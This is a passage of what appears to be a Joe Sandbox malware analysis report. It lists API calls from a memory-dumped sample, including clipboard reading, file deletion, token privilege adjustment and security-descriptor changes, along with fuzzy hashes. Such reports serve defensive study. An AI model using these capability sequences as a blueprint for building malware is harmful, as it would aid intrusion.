                                                                                                                                                                                                                                                                                                        • Instruction ID: 20f14e9dffafe50d2cfb73530aeaffd7a5f3a58a80efa6d77c964ff5ca0c65c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb2b703d0bea2568805d9b0664af71014f255f26f2b423121c1e29c1d66a2b2e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3F028B36007007EC7109F29CC06BA6BB99EB44360F14822BFA19CB2D1DB75E410DBA0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0102F987
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 523b9127e340cd2770f1fc5a0f5b61dedf428476ecaf2b9219f047326fd02d86
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3dda06c60c9dbaf3316aed67b928a7af89d88b8392565a1f67b3a2c0e4483e90
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 523b9127e340cd2770f1fc5a0f5b61dedf428476ecaf2b9219f047326fd02d86
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF0DC72A00204BFCB00EBA5DC4AE9E77B9EF89320F000055F5049B361DE34EA40DB60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00FE319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00FE5031
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e54f008dcf21acd09008e1fe2ffc356363310c3e61c12ba6275a9c066c98e7c7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c8a791679faacc446f94de832659ab8cdece4fe1d24b28b96f1101fb56cfb74
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e54f008dcf21acd09008e1fe2ffc356363310c3e61c12ba6275a9c066c98e7c7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1F0E937A14E6267DF315A67DC01F5A3749AF80FF4F188012BE04D7194DA34D805B6E0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00FD6A79,?,0000015D,?,?,?,?,00FD85B0,000000FF,00000000,?,?), ref: 00FE3BC5
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cc00b681b7012f07a2aa13834d88c3723eedd7f6229527d1264838639b0fb5d1
                                                                                                                                                                                                                                                                                                        • Instruction ID: a041f02461915fc65c919757d7736206a854831d64f56285b34607b2795d6223
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc00b681b7012f07a2aa13834d88c3723eedd7f6229527d1264838639b0fb5d1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DE0E532A00AA066DA302A739C0DF5A3649AFC17B0F580121EC47D7590CB24CD00B2A1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: c19e6eee9c59a893c584b620ecf04e014a7f4ebd6eb89e0aecb7ea581726f9e3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 33537075569929d1f58300e1ced23ef9a5b512f3cf043164ea2867af671b5586
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c19e6eee9c59a893c584b620ecf04e014a7f4ebd6eb89e0aecb7ea581726f9e3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F030B1505701CFCB349F65D4A0866B7E5BF14329324897EE6D6C6620CB369840EF50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38a4ca07bf26fae4eb178279e4b4e0c5c0dcb2820b3ec12d914518862ba6310a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0fce08a3d9d54222f441fd660af908b5910758190546958e8b378a8ef65a890d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38a4ca07bf26fae4eb178279e4b4e0c5c0dcb2820b3ec12d914518862ba6310a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FF0E5B1B04201AAE7316BA89806BA5F7E9BB01315F00455ED4D5831C3CFB740F4A761
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                        • Instruction ID: f8cfc05d9cdf3467ff103dfd85f5ff9f2e314ab713d3cb8c15c250b813bc0efc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEF0D47650020DFBDF05DF90C941EAA7B79FF14318F248445F9159A251C336EA21ABA1
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FB3963
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 92729173e22eb6f8d712e2185517c1edf22e743ad9b962e3a6234fb14bda14dd
                                                                                                                                                                                                                                                                                                        • Instruction ID: 77b3bee15149de00621cf2bbc61664071c5a89b6eb4e1040c0d0bfa1760ed6ce
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92729173e22eb6f8d712e2185517c1edf22e743ad9b962e3a6234fb14bda14dd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6F0A7709043149FE7629F24DC457D97BBCA701708F0040A5A6C496285DB754788CF81
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00FB3A76
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,00FF0A84,?,?,00000000,?,00FF0A84,00000000,0000000C), ref: 00FF0737
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,0101D840), ref: 0101EAB1
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DC54: FindFirstFileW.KERNEL32(?,?), ref: 0101DCCB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0101DD1B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0101DD2C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DC54: FindClose.KERNEL32(00000000), ref: 0101DD43
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0102666E
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101205A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01012087
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: GetLastError.KERNEL32 ref: 01012097
                                                                                                                                                                                                                                                                                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 01011BD2
                                                                                                                                                                                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 01011BF4
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 01011C05
                                                                                                                                                                                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01011C1D
                                                                                                                                                                                                                                                                                                        • GetProcessWindowStation.USER32 ref: 01011C36
                                                                                                                                                                                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 01011C40
                                                                                                                                                                                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01011C5C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01011B48), ref: 01011A20
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A0B: CloseHandle.KERNEL32(?,?,01011B48), ref: 01011A35
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                                        • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                                        • Opcode ID: 075e5498e96083381efe4966c5d6585d7b880f40586ea7478f1a6e4f7f737aec
                                                                                                                                                                                                                                                                                                        • Instruction ID: 07b5a3b06c9c9729590e3e735ec12d6ae1ed25069d23d5f871af98acf7b8c08b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 075e5498e96083381efe4966c5d6585d7b880f40586ea7478f1a6e4f7f737aec
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 968180B1900209AFEF25AFA4DD89FEE7FB8EF08304F544059FA94A6194D7398945CB50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011A60
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A6C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A7B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A82
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01011A99
                                                                                                                                                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01011518
                                                                                                                                                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0101154C
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 01011563
                                                                                                                                                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0101159D
                                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010115B9
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 010115D0
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 010115D8
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 010115DF
                                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01011600
                                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 01011607
                                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01011636
                                                                                                                                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01011658
                                                                                                                                                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0101166A
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01011691
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 01011698
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010116A1
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010116A8
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010116B1
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010116B8
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 010116C4
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 010116CB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: GetProcessHeap.KERNEL32(00000008,010114FD,?,00000000,?,010114FD,?), ref: 01011AED
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,010114FD,?), ref: 01011AF4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01011ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,010114FD,?), ref: 01011B03
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38928d9d30a1e48f2793f0753fd6f6b475ae9b4c058dc2eb39a41fff97c27ec8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d4ba1ff1aaed30706c93a4c7ef5fc7c630775b5e9f96bd51bba677de8fdc058
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38928d9d30a1e48f2793f0753fd6f6b475ae9b4c058dc2eb39a41fff97c27ec8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E717EB6900209BBEF50DFB4DC44FEEBBB8BF18240F084555FA95A7194D73A9905CBA0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(0104DCD0), ref: 0102F586
                                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0102F594
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 0102F5A0
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0102F5AC
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0102F5E4
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0102F5EE
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0102F619
                                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0102F626
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 0102F62E
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0102F63F
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0102F67F
                                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 0102F695
                                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000F), ref: 0102F6A1
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0102F6B2
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0102F6D4
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0102F6F1
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0102F72F
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0102F750
                                                                                                                                                                                                                                                                                                        • CountClipboardFormats.USER32 ref: 0102F771
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0102F7B6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 01027403
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 01027457
                                                                                                                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01027493
                                                                                                                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 010274BA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 010274F7
                                                                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 01027524
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0102A0A8
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0102A0E6
                                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0102A100
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0102A118
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A123
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0102A13F
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0102A18F
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(01077B94), ref: 0102A1AD
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0102A1B7
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A1C4
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A1D4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
